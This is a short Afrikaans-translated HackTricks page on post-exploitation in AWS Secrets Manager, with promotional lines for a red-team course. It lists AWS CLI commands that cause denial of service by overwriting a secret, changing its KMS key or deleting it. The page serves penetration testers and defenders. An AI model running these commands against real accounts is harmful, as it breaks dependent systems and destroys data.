AWS - Secrets Manager Post Exploitation

Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun:

Geheimbestuurder

Vir meer inligting, kyk:

AWS - Secrets Manager Enum

Lees Geheime

Die geheime self is sensitiewe inligting, kyk na die privesc-bladsy om te leer hoe om hulle te lees.

DoS Verandering Geheimwaarde

Deur die waarde van die geheim te verander, kan jy DoS al die stelsels wat van daardie waarde afhanklik is.

Let daarop dat vorige waardes ook gestoor word, dus dit is maklik om net terug te gaan na die vorige waarde.

```bash # Requires permission secretsmanager:PutSecretValue aws secretsmanager put-secret-value \ --secret-id MyTestSecret \ --secret-string "{\"user\":\"diegor\",\"password\":\"EXAMPLE-PASSWORD\"}" ``` ### DoS Verander KMS-sleutel ```bash aws secretsmanager update-secret \ --secret-id MyTestSecret \ --kms-key-id arn:aws:kms:us-west-2:123456789012:key/EXAMPLE1-90ab-cdef-fedc-ba987EXAMPLE ``` ### DoS Verwydering van Geheim

Die minimum aantal dae om 'n geheim te verwyder is 7

aws secretsmanager delete-secret \
--secret-id MyTestSecret \
--recovery-window-in-days 7
Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun:

Last updated